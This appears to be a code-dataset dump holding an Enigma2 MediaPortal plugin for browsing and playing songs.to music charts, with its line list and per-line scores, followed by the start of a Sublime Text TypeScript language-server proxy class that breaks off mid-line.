mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel" : self.keyCancel }, -1) self["title"] = Label("Songs.to Music Player") self['ContentTitle'] = Label(self.scGuiName) self['name'] = Label(_("Selection:")) self.streamList = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.keyLocked = False self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): self.keyLocked = True if self.scGuiName != "Songs Top 500" and not re.match('Search.*?', self.scGuiName): self.scData(self.scLink) else: getPage(self.scLink, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scData).addErrback(self.dataError) def scData(self, data): data = data.replace('"cover":null','"cover":"",') findSongs = re.findall('"hash":"(.*?)","title":"(.*?)","artist":"(.*?)","album":"(.*?)".*?"cover":"(.*?)"', data, re.S) if findSongs: for (scHash,scTitle,scArtist,scAlbum,scCover) in findSongs: self.streamList.append((decodeHtml(scTitle), decodeHtml(scArtist), scAlbum, scCover, scHash)) if len(self.streamList) == 0: self.streamList.append((_("No songs found!"), None, None, None, None)) self.ml.setList(map(self.songsto_playlist, self.streamList)) self.keyLocked = False def keyOK(self): if self.keyLocked: return if self['liste'].getCurrent()[0][1] == None: return idx = self['liste'].getSelectedIndex() self.session.open(SongstoPlayer, self.streamList, 'songstoall', int(idx), self.scGuiName) class showSongstoTop(MPScreen): def __init__(self, session, link, name): self.scLink = link self.scGuiName = name 
self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel" : self.keyCancel }, -1) self["title"] = Label("Songs.to Music Player") self['ContentTitle'] = Label(self.scGuiName) self['name'] = Label(_("Selection:")) self.streamList = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.keyLocked = False self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): self.keyLocked = True getPage(self.scLink, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scDataGet).addErrback(self.dataError) def scDataGet(self, data): findSongs = re.findall('name1":"(.*?)","name2":"(.*?)"', data, re.S) if findSongs: for (scArtist, scTitle) in findSongs: self.streamList.append((decodeHtml(scTitle), decodeHtml(scArtist))) if len(self.streamList) == 0: self.streamList.append((_("No songs found!"), None)) self.ml.setList(map(self.songsto_playlist, self.streamList)) self.keyLocked = False def scDataPost(self, data): self.keyLocked = False if self.artist == '': title = self.album else: title = self.artist + ' - ' + self.album self.session.open(showSongstoAll, data, title) def keyOK(self): if self.keyLocked: return if self['liste'].getCurrent()[0][1] == None: return if "album" in self.scLink: self.keyLocked = True self.artist = self['liste'].getCurrent()[0][1] self.album = self['liste'].getCurrent()[0][0] url = "http://songs.to/json/songlist.php?quickplay=1" dataPost = 
"data=%7B%22data%22%3A%5B%7B%22artist%22%3A%22"+self.artist+"%22%2C%20%22album%22%3A%22"+self.album+"%22%2C%20%22title%22%3A%22%22%7D%5D%7D" getPage(url, method='POST', postdata=dataPost, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scDataPost).addErrback(self.dataError) else: idx = self['liste'].getSelectedIndex() self.session.open(SongstoPlayer, self.streamList, 'songstotop', int(idx), self.scGuiName) class songstoPlaylist(SimplePlaylist): def playListEntry(self, entry): if entry[1] == '': title = entry[0] else: title = entry[1] + ' - ' + entry[0] width = self['liste'].instance.size().width() height = self['liste'].l.getItemSize().height() self.ml.l.setFont(0, gFont('mediaportal', height - 2 * mp_globals.sizefactor)) res = [entry] res.append((eListboxPythonMultiContent.TYPE_TEXT, 0, 0, width, height, 0, RT_HALIGN_LEFT | RT_VALIGN_CENTER, title)) return res class SongstoPlayer(SimplePlayer): def __init__(self, session, playList, songsto_type, playIdx=0, listTitle=None): self.songsto_type = songsto_type SimplePlayer.__init__(self, session, playList, playIdx=playIdx, playAll=True, listTitle=listTitle, ltype='songsto', cover=True, autoScrSaver=True) def getVideo(self): sc_artist = self.playList[self.playIdx][1] sc_title = self.playList[self.playIdx][self.title_inr] if self.songsto_type == 'songstotop': sc_album = '' token = '' imgurl = '' else: sc_album = self.playList[self.playIdx][2] token = self.playList[self.playIdx][4] imgurl = self.playList[self.playIdx][3] imgurl = "http://songs.to/covers/"+imgurl SongstoLink(self.session).getLink(self.playStream, self.dataError, sc_title, sc_artist, sc_album, token, imgurl) def openPlaylist(self, pl_class=songstoPlaylist): SimplePlayer.openPlaylist(self, pl_class)
[ "# -*- coding: utf-8 -*-\n", "from Plugins.Extensions.MediaPortal.plugin import _\n", "from Plugins.Extensions.MediaPortal.resources.imports import *\n", "from Plugins.Extensions.MediaPortal.resources.keyboardext import VirtualKeyBoardExt\n", "from Plugins.Extensions.MediaPortal.resources.songstolink import SongstoLink\n", "from Plugins.Extensions.MediaPortal.resources.simpleplayer import SimplePlayer, SimplePlaylist\n", "\n", "class showSongstoGenre(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\r\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\"\t\t: self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself.baseurl = 'http://songs.to/json/songlist.php?'\n", "\n", "\t\tself[\"title\"] = Label(\"Songs.to Music Player\")\n", "\t\tself['ContentTitle'] = Label('Music Tops')\n", "\t\tself['name'] = Label(_(\"Selection:\"))\n", "\n", "\t\tself.genreliste = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.keyLocked = False\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tself.keyLocked = True\n", "\t\turl = \"http://s.songs.to/js/data-en.js\"\n", "\t\tgetPage(url).addCallback(self.genreData).addErrback(self.dataError)\n", "\n", "\tdef genreData(self, data):\n", "\t\tpreparse = re.search('chart_types={(.*?)}', data, re.S).groups()\n", "\t\tif 
preparse:\n", "\t\t\tparse = re.findall(\"(music.*?):\\\\'(.*?)\\\\'\", preparse[0], re.S)\n", "\t\tif parse:\n", "\t\t\tfor (scUrl, scName) in parse:\n", "\t\t\t\tself.genreliste.append((scName, \"charts=\"+scUrl))\n", "\t\t\tself.genreliste.insert(0, (\"Songs Top 500\", \"top=all\"))\n", "\t\t\tself.genreliste.insert(0, (\"Search Album\", \"&col=album\"))\n", "\t\t\tself.genreliste.insert(0, (\"Search Title\", \"&col=title\"))\n", "\t\t\tself.genreliste.insert(0, (\"Search Artist\", \"&col=artist\"))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\t\t\tself.keyLocked = False\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tscName = self['liste'].getCurrent()[0][0]\n", "\t\tscUrl = self['liste'].getCurrent()[0][1]\n", "\t\tif scName == \"Songs Top 500\":\n", "\t\t\tscUrl = self.baseurl + scUrl\n", "\t\t\tself.session.open(showSongstoAll, scUrl, scName)\n", "\t\telif re.match('Search.*?', scName):\n", "\t\t\tself.suchtitel = scName\n", "\t\t\tself.suchmodus = scUrl\n", "\t\t\tself.session.openWithCallback(self.searchCallback, VirtualKeyBoardExt, title = (self.suchtitel), text = \"\", is_dialog=True)\n", "\t\telse:\n", "\t\t\tscUrl = self.baseurl + scUrl\n", "\t\t\tself.session.open(showSongstoTop, scUrl, scName)\n", "\n", "\tdef searchCallback(self, callbackStr):\n", "\t\tif callbackStr is not None:\n", "\t\t\tself.suchString = callbackStr.replace(' ', '%20')\n", "\t\t\tscUrl = self.baseurl + \"keyword=\" + self.suchString + self.suchmodus\n", "\t\t\tscName = self.suchtitel + \": \" + callbackStr\n", "\t\t\tself.session.open(showSongstoAll, scUrl, scName)\n", "\n", "class showSongstoAll(MPScreen):\n", "\n", "\tdef __init__(self, session, link, name):\n", "\t\tself.scLink = link\n", "\t\tself.scGuiName = name\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, 
config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\r\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\"\t\t: self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\" : self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself[\"title\"] = Label(\"Songs.to Music Player\")\n", "\t\tself['ContentTitle'] = Label(self.scGuiName)\n", "\t\tself['name'] = Label(_(\"Selection:\"))\n", "\n", "\t\tself.streamList = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.keyLocked = False\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tself.keyLocked = True\n", "\t\tif self.scGuiName != \"Songs Top 500\" and not re.match('Search.*?', self.scGuiName):\n", "\t\t\tself.scData(self.scLink)\n", "\t\telse:\n", "\t\t\tgetPage(self.scLink, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scData).addErrback(self.dataError)\n", "\n", "\tdef scData(self, data):\n", "\t\tdata = data.replace('\"cover\":null','\"cover\":\"\",')\n", "\t\tfindSongs = re.findall('\"hash\":\"(.*?)\",\"title\":\"(.*?)\",\"artist\":\"(.*?)\",\"album\":\"(.*?)\".*?\"cover\":\"(.*?)\"', data, re.S)\n", "\t\tif findSongs:\n", "\t\t\tfor (scHash,scTitle,scArtist,scAlbum,scCover) in findSongs:\n", "\t\t\t\tself.streamList.append((decodeHtml(scTitle), decodeHtml(scArtist), scAlbum, scCover, scHash))\n", "\t\tif len(self.streamList) == 0:\n", "\t\t\tself.streamList.append((_(\"No songs found!\"), None, None, None, None))\n", "\t\tself.ml.setList(map(self.songsto_playlist, self.streamList))\n", "\t\tself.keyLocked = False\n", "\n", "\tdef keyOK(self):\n", "\t\tif 
self.keyLocked:\n", "\t\t\treturn\n", "\t\tif self['liste'].getCurrent()[0][1] == None:\n", "\t\t\treturn\n", "\t\tidx = self['liste'].getSelectedIndex()\n", "\t\tself.session.open(SongstoPlayer, self.streamList, 'songstoall', int(idx), self.scGuiName)\n", "\n", "class showSongstoTop(MPScreen):\n", "\n", "\tdef __init__(self, session, link, name):\n", "\t\tself.scLink = link\n", "\t\tself.scGuiName = name\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\r\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\"\t\t: self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\" : self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself[\"title\"] = Label(\"Songs.to Music Player\")\n", "\t\tself['ContentTitle'] = Label(self.scGuiName)\n", "\t\tself['name'] = Label(_(\"Selection:\"))\n", "\n", "\t\tself.streamList = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.keyLocked = False\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tself.keyLocked = True\n", "\t\tgetPage(self.scLink, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scDataGet).addErrback(self.dataError)\n", "\n", "\tdef scDataGet(self, data):\n", "\t\tfindSongs = re.findall('name1\":\"(.*?)\",\"name2\":\"(.*?)\"', data, re.S)\n", "\t\tif findSongs:\n", "\t\t\tfor (scArtist, scTitle) in findSongs:\n", "\t\t\t\tself.streamList.append((decodeHtml(scTitle), 
decodeHtml(scArtist)))\n", "\t\tif len(self.streamList) == 0:\n", "\t\t\tself.streamList.append((_(\"No songs found!\"), None))\n", "\t\tself.ml.setList(map(self.songsto_playlist, self.streamList))\n", "\t\tself.keyLocked = False\n", "\n", "\tdef scDataPost(self, data):\n", "\t\tself.keyLocked = False\n", "\t\tif self.artist == '':\n", "\t\t\ttitle = self.album\n", "\t\telse:\n", "\t\t\ttitle = self.artist + ' - ' + self.album\n", "\t\tself.session.open(showSongstoAll, data, title)\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tif self['liste'].getCurrent()[0][1] == None:\n", "\t\t\treturn\n", "\t\tif \"album\" in self.scLink:\n", "\t\t\tself.keyLocked = True\n", "\t\t\tself.artist = self['liste'].getCurrent()[0][1]\n", "\t\t\tself.album = self['liste'].getCurrent()[0][0]\n", "\t\t\turl = \"http://songs.to/json/songlist.php?quickplay=1\"\n", "\t\t\tdataPost = \"data=%7B%22data%22%3A%5B%7B%22artist%22%3A%22\"+self.artist+\"%22%2C%20%22album%22%3A%22\"+self.album+\"%22%2C%20%22title%22%3A%22%22%7D%5D%7D\"\n", "\t\t\tgetPage(url, method='POST', postdata=dataPost, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.scDataPost).addErrback(self.dataError)\n", "\t\telse:\n", "\t\t\tidx = self['liste'].getSelectedIndex()\n", "\t\t\tself.session.open(SongstoPlayer, self.streamList, 'songstotop', int(idx), self.scGuiName)\n", "\n", "class songstoPlaylist(SimplePlaylist):\n", "\n", "\tdef playListEntry(self, entry):\n", "\t\tif entry[1] == '':\n", "\t\t\ttitle = entry[0]\n", "\t\telse:\n", "\t\t\ttitle = entry[1] + ' - ' + entry[0]\n", "\t\twidth = self['liste'].instance.size().width()\n", "\t\theight = self['liste'].l.getItemSize().height()\n", "\t\tself.ml.l.setFont(0, gFont('mediaportal', height - 2 * mp_globals.sizefactor))\n", "\t\tres = [entry]\n", "\t\tres.append((eListboxPythonMultiContent.TYPE_TEXT, 0, 0, width, height, 0, RT_HALIGN_LEFT | RT_VALIGN_CENTER, title))\n", "\t\treturn res\n", "\n", "class 
SongstoPlayer(SimplePlayer):\n", "\n", "\tdef __init__(self, session, playList, songsto_type, playIdx=0, listTitle=None):\n", "\t\tself.songsto_type = songsto_type\n", "\n", "\t\tSimplePlayer.__init__(self, session, playList, playIdx=playIdx, playAll=True, listTitle=listTitle, ltype='songsto', cover=True, autoScrSaver=True)\n", "\n", "\tdef getVideo(self):\n", "\t\tsc_artist = self.playList[self.playIdx][1]\n", "\t\tsc_title = self.playList[self.playIdx][self.title_inr]\n", "\t\tif self.songsto_type == 'songstotop':\n", "\t\t\tsc_album = ''\n", "\t\t\ttoken = ''\n", "\t\t\timgurl = ''\n", "\t\telse:\n", "\t\t\tsc_album = self.playList[self.playIdx][2]\n", "\t\t\ttoken = self.playList[self.playIdx][4]\n", "\t\t\timgurl = self.playList[self.playIdx][3]\n", "\t\t\timgurl = \"http://songs.to/covers/\"+imgurl\n", "\n", "\t\tSongstoLink(self.session).getLink(self.playStream, self.dataError, sc_title, sc_artist, sc_album, token, imgurl)\n", "\n", "\tdef openPlaylist(self, pl_class=songstoPlaylist):\n", "\t\tSimplePlayer.openPlaylist(self, pl_class)" ]
[ 0, 0, 0, 0.011904761904761904, 0, 0.010526315789473684, 0, 0.029411764705882353, 0, 0.03333333333333333, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0, 0, 0.041666666666666664, 0.08, 0.08, 0.03571428571428571, 0.1111111111111111, 0, 0.018518518518518517, 0, 0.02040816326530612, 0.022222222222222223, 0.025, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.04, 0, 0.02, 0, 0.037037037037037035, 0.041666666666666664, 0.023809523809523808, 0.014285714285714285, 0, 0.03571428571428571, 0.014925373134328358, 0.06666666666666667, 0.014925373134328358, 0.08333333333333333, 0.030303030303030304, 0.018518518518518517, 0.01694915254237288, 0.01639344262295082, 0.01639344262295082, 0.015873015873015872, 0.015151515151515152, 0.038461538461538464, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.022727272727272728, 0.023255813953488372, 0.03125, 0.03125, 0.019230769230769232, 0.02631578947368421, 0.037037037037037035, 0.038461538461538464, 0.047244094488188976, 0.125, 0.03125, 0.019230769230769232, 0, 0.025, 0.03333333333333333, 0.018867924528301886, 0.013888888888888888, 0.020833333333333332, 0.019230769230769232, 0, 0.03125, 0, 0.023809523809523808, 0.047619047619047616, 0.041666666666666664, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0, 0, 0.041666666666666664, 0.08, 0.09090909090909091, 0.06896551724137931, 0.1111111111111111, 0, 0.02040816326530612, 0.02127659574468085, 0.025, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.04, 0, 0.02, 0, 0.037037037037037035, 0.041666666666666664, 0.023255813953488372, 0.03571428571428571, 0.125, 0.021739130434782608, 0, 0.04, 0.038461538461538464, 0.01639344262295082, 0.0625, 0.07936507936507936, 0.02040816326530612, 0.03125, 0.013513513513513514, 
0.015873015873015872, 0.04, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.0425531914893617, 0.1, 0.024390243902439025, 0.021739130434782608, 0, 0.03125, 0, 0.023809523809523808, 0.047619047619047616, 0.041666666666666664, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0, 0, 0.041666666666666664, 0.08, 0.09090909090909091, 0.06896551724137931, 0.1111111111111111, 0, 0.02040816326530612, 0.02127659574468085, 0.025, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.04, 0, 0.02, 0, 0.037037037037037035, 0.041666666666666664, 0.02142857142857143, 0, 0.03571428571428571, 0.014084507042253521, 0.0625, 0.024390243902439025, 0.013888888888888888, 0.03125, 0.017857142857142856, 0.015873015873015872, 0.04, 0, 0.034482758620689655, 0.04, 0.041666666666666664, 0.045454545454545456, 0.125, 0.022727272727272728, 0.02040816326530612, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.0425531914893617, 0.1, 0.034482758620689655, 0.04, 0.02, 0.02040816326530612, 0.017543859649122806, 0.012903225806451613, 0.017857142857142856, 0.125, 0.023809523809523808, 0.021505376344086023, 0, 0.02564102564102564, 0, 0.030303030303030304, 0.047619047619047616, 0.05, 0.125, 0.02564102564102564, 0.020833333333333332, 0.02, 0.024691358024691357, 0.0625, 0.01680672268907563, 0.07692307692307693, 0, 0.02857142857142857, 0, 0.024691358024691357, 0.02857142857142857, 0, 0.013422818791946308, 0, 0.047619047619047616, 0.022222222222222223, 0.017543859649122806, 0.025, 0.058823529411764705, 0.07142857142857142, 0.06666666666666667, 0.125, 0.022222222222222223, 0.023809523809523808, 0.023255813953488372, 0.022222222222222223, 0, 0.017391304347826087, 0, 0.0196078431372549, 0.046511627906976744 ]
250
0.031729
false
import sublime from . import json_helpers from .global_vars import IS_ST2 from .node_client import CommClient from .text_helpers import Location class ServiceProxy: def __init__(self, worker_client=CommClient(), server_client=CommClient()): self.__comm = server_client self.__worker_comm = worker_client self.seq = 1 def increase_seq(self): temp = self.seq self.seq += 1 return temp def exit(self): req_dict = self.create_req_dict("exit") json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def stop_worker(self): req_dict = self.create_req_dict("exit") json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def configure(self, host_info="Sublime Text", file=None, format_options=None): args = {"hostInfo": host_info, "formatOptions": format_options, "file": file} req_dict = self.create_req_dict("configure", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) self.set_inferred_project_compiler_options() def set_inferred_project_compiler_options(self): """ Add full type support for compilers running in file scope mode """ compiler_options = { "target": "ESNext", # enable all es-next features "allowJs": True, # enable javascript support "jsx": "Preserve", # enable jsx support "noEmit": True # do not emit outputs } args = { "options": compiler_options } req_dict = self.create_req_dict("compilerOptionsForInferredProjects", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def change(self, path, begin_location=Location(1, 1), end_location=Location(1, 1), insertString=""): args = { "file": path, "line": begin_location.line, "offset": begin_location.offset, "endLine": end_location.line, "endOffset": end_location.offset, 
"insertString": insertString } req_dict = self.create_req_dict("change", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def completions(self, path, location=Location(1, 1), prefix="", on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix} req_dict = self.create_req_dict("completions", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmd( json_str, lambda response_dict: None if on_completed is None else on_completed(response_dict), req_dict["seq"] ) def async_completions(self, path, location=Location(1, 1), prefix="", on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix} req_dict = self.create_req_dict("completions", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) def signature_help(self, path, location=Location(1, 1), prefix="", on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix} req_dict = self.create_req_dict("signatureHelp", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmd( json_str, lambda response_dict: None if on_completed is None else on_completed(response_dict), req_dict["seq"] ) def async_signature_help(self, path, location=Location(1, 1), prefix="", on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset, "prefix": prefix} req_dict = self.create_req_dict("signatureHelp", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) def definition(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("definition", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) 
return response_dict def type_definition(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("typeDefinition", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def format(self, path, begin_location=Location(1, 1), end_location=Location(1, 1)): args = { "file": path, "line": begin_location.line, "offset": begin_location.offset, "endLine": end_location.line, "endOffset": end_location.offset } req_dict = self.create_req_dict("format", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def format_on_key(self, path, location=Location(1, 1), key=""): args = {"file": path, "line": location.line, "offset": location.offset, "key": key} req_dict = self.create_req_dict("formatonkey", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def organize_imports(self, path): args = { "scope": { "type": "file", "args": { "file": path } }, } req_dict = self.create_req_dict("organizeImports", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def open(self, path): args = {"file": path} req_dict = self.create_req_dict("open", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def open_on_worker(self, path): args = {"file": path} req_dict = self.create_req_dict("open", args) json_str = 
json_helpers.encode(req_dict) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def close(self, path): args = {"file": path} req_dict = self.create_req_dict("close", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def references(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("references", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def reload(self, path, alternate_path): args = {"file": path, "tmpfile": alternate_path} req_dict = self.create_req_dict("reload", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def reload_on_worker(self, path, alternate_path): args = {"file": path, "tmpfile": alternate_path} req_dict = self.create_req_dict("reload", args) json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): response_dict = self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def reload_async(self, path, alternate_path, on_completed): args = {"file": path, "tmpfile": alternate_path} req_dict = self.create_req_dict("reload", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdAsync(json_str, None, req_dict["seq"]) def reload_async_on_worker(self, path, alternate_path, on_completed): args = {"file": path, "tmpfile": alternate_path} req_dict = self.create_req_dict("reload", args) json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): self.__worker_comm.sendCmdAsync(json_str, None, req_dict["seq"]) def rename(self, 
path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("rename", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) if self.__worker_comm.started(): self.__worker_comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def get_applicable_refactors_async(self, path, start_loc, end_loc, on_completed): args = { "file": path, "startLine": start_loc.line, "startOffset": start_loc.offset, "endLine": end_loc.line, "endOffset": end_loc.offset, } req_dict = self.create_req_dict("getApplicableRefactors", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) def get_edits_for_refactor_async(self, path, refactor_name, action_name, start_loc, end_loc, on_completed): args = { "file": path, "startLine": start_loc.line, "startOffset": start_loc.offset, "endLine": end_loc.line, "endOffset": end_loc.offset, "refactor": refactor_name, "action": action_name, } req_dict = self.create_req_dict("getEditsForRefactor", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) #on_completed(response_dict) #return response_dict def request_get_err(self, delay=0, pathList=[]): args = {"files": pathList, "delay": delay} req_dict = self.create_req_dict("geterr", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) def request_get_err_for_project(self, delay=0, path=""): args = {"file": path, "delay": delay} req_dict = self.create_req_dict("geterrForProject", args) json_str = json_helpers.encode(req_dict) if self.__worker_comm.started(): self.__worker_comm.postCmd(json_str) def type(self, path, location=Location(1, 1)): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("type", args) json_str = json_helpers.encode(req_dict) response_dict = 
